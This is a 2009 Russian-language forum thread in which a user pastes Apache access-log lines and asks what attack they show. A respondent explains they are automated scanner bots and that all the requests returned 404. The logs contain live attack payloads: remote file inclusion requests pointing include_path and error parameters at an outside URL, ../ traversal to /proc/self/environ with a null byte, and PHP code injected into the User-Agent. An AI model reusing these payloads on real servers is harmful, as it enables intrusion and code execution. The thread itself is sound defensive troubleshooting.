nixp.ru v3.0

17 октября 2017,
вторник,
09:14:45 MSK

DevOps с компанией «Флант»
raba написал 26 мая 2009 года в 10:51 (825 просмотров) Ведет себя неопределенно; открыл 33 темы в форуме, оставил 77 комментариев на сайте.

Не могу понят какую дырку ползуют и насколько ето опасно, а главное как проинспектит софт, когда в CentOS security report не работает?

/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET /manual/mod//includes/messages.inc.php?include_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1» 404 316 «-» «Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b»

/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET //includes/messages.inc.php?include_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1» 404 304 «-» «Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b»

/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET /manual//includes/messages.inc.php?include_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1» 404 312 «-» «Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b»

/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET /manual/mod//includes/messages.inc.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1» 404 316 «-» «XXX<? echo \«w0000t\»; ?>
XXX»

/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET /manual//includes/messages.inc.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1» 404 312 «-» «XXX<? echo \«w0000t\»; ?>
XXX»

/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET //includes/messages.inc.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1» 404 304 «-» «XXX<? echo \«w0000t\»; ?>
XXX»

/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:47 +0400] «GET /manual/mod//includes/messages.inc.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1» 404 316 «-» «XXX<? echo \«w0000t\»; ?>
XXX»

/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:47 +0400] «GET //includes/messages.inc.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1» 404 304 «-» «XXX<? echo \«w0000t\»; ?>
XXX»

/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:47 +0400] «GET /manual//includes/messages.inc.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1» 404 312 «-» «XXX<? echo \«w0000t\»; ?>
XXX»

/var/log/httpd/access_log.3:79.165.160.223 — - [23/May/2009:23:44:10 +0400] «GET /engine/modules/antibot.php HTTP/1.1» 404 300 «-» «-»

/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET /manual/mod/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1» 404 300 «-» «Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6»

/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET /manual/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1» 404 296 «-» «Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6»

/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1» 404 289 «-» «Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6»

/var/log/httpd/access_log.5:218.1.64.133 — - [21/May/2009:14:20:24 +0400] «GET /manual/en/mod/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1» 404 299 «-» «Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6»

/var/log/httpd/access_log.5:218.1.64.133 — - [21/May/2009:14:20:27 +0400] «GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1» 404 285 «-» «Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6»

/var/log/httpd/access_log.5:218.1.64.133 — - [21/May/2009:14:20:28 +0400] «GET /manual/en/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1» 404 295 «-» «Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6»

/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET /manual//includes/messages.inc.php?include_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1» 404 312 «-» «Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b»

/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET /manual//includes/messages.inc.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1» 404 312 «-» «XXX<? echo \«w0000t\»; ?>
XXX»

/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:47 +0400] «GET /manual//includes/messages.inc.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1» 404 312 «-» «XXX<? echo \«w0000t\»; ?>
XXX»

/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET /manual/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1» 404 296 «-» «Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6»

/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET /manual/mod//includes/messages.inc.php?include_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1» 404 316 «-» «Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b»

/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET /manual/mod//includes/messages.inc.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1» 404 316 «-» «XXX<? echo \«w0000t\»; ?>
XXX»

/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:47 +0400] «GET /manual/mod//includes/messages.inc.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1» 404 316 «-» «XXX<? echo \«w0000t\»; ?>
XXX»

Дмитрий Шурупов

А с чего вы взяли, что какую-то дырку здесь используют?

Это тупые боты обходят веб-серверы в поисках стандартных скриптов и стандартных уязвимостей в них. В данном случае ваш Apache гордо отвечает 404, поскольку такие скрипты на нем не размещены.

Спать можно спокойно.

raba

Обьясняю — мой админ уже 2 недели дрючить меня с етим. Я ему что-то похожие и сказал, но он не отстает и подумал я раз уж умнее меня, наверное я что-то недопанимаиваю,поетому решил спросить!

Дмитрий Шурупов

Покажите ему ошибочку 404 в логах и файловую систему, в которой таких файлов нет.

Можно продемонстрировать запросы к апачу, воспроизводя их (те, что в логах) и не получая никаких результатов.

raba

Ладно,так и сделаю! Спасибо за поддержку! Удачи!